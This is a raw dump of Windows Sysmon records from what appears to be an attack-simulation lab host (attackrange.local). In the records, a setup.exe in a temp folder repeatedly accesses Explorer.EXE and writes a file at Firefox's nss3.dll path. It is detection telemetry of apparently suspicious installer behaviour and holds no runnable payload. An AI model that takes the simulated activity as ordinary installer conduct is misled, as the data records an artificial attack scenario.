13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015158Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015157Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015156Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015155Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015154Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015153Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015152Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015151Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015150Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015149Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015148Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015147Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015146Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015145Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015144Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000015143Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\nss3.dll2021-01-18 13:59:52.442 10341000x800000000000000015142Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015141Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 